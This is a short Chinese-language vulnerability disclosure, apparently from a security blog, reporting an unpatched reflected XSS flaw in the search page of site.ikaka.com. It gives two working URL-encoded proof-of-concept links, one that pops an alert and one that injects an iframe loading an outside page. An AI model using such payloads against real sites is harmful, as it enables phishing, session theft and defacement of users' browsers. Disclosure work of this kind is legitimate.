1, site.ikaka.com
[Title:卡卡网站吧]
▁▂▃▄[size=+0]▅▆▇
未修复
(XSS)
*发现者:
Safelab
| 测试地址1:
>>>>http://site.ikaka.com/aspx/search.aspx?kw=%3C/script%3E%3Cscript%3Ealert%286%29%3C/script%3E%2Fmarquee%3E%3Ch1%3ESafelab%3C%2Fh1%3E%3C%2Fmarquee%3E 打开后将显示对话框“6”,一行字“Safelab”(底部)(请复制以上蓝色地址到地址栏测试)
测试地址2:
>>>>http://site.ikaka.com/aspx/search.aspx?kw=%3C/script%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fsafelab.spaces.live.com%3E%3C%2Fiframe%3E%2Fmarquee%3E%3Ch1%3ESafelab%3C%2Fh1%3E%3C%2Fmarquee%3E 打开后将显示一个IFrame指向本博客,一行字“Safelab”(底部)(请复制以上蓝色地址到地址栏测试)
Alexa Rank: 10440 ★
Google PageRank: 
概述:一个杀软厂商旗下网站,恶意构造的查询关键字可能导致非法用途。
威胁度: 6 (高)
分析: Safelab.spaces.live.com
|
